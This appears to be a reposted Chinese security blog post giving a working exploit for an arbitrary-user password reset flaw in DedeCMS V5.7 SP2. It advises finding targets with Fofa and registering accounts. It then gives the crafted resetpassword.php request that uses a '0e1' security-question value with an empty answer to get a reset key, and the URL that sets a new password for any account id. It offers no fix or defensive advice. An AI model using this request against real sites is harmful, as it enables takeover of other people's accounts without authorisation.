DedeCMS任意用户密码重置漏洞

2023年11月8日00:15:07评论49 views字数 367阅读1分13秒阅读模式

Fofa搜dedecms

重置系统的所有账号的密码

DeDecms V5.7 SP2最新版本

首先注册账号0000001/0000002

DedeCMS任意用户密码重置漏洞

登录成功

DedeCMS任意用户密码重置漏洞

通过登录抓包知道此账号对应的id号为16然后清除cookie退出浏览器，再次访问登录页面

DedeCMS任意用户密码重置漏洞

构造请求包生成poc

/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=16

DedeCMS任意用户密码重置漏洞

根据poc构造重置密码的url

http://www.xxx.com/member/resetpassword.php?dopost=getpasswd&id=16&key=b8sJ1HN6

DedeCMS任意用户密码重置漏洞

直接在这对目标账号修改个新密码就行了。

原文始发于微信公众号（赛瑞攻防实验室）：DedeCMS任意用户密码重置漏洞

本文由 admin 发表于 2023年11月8日00:15:07
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
DedeCMS任意用户密码重置漏洞http://cn-sec.com/archives/887304.html

PostExpKit - 20240423更新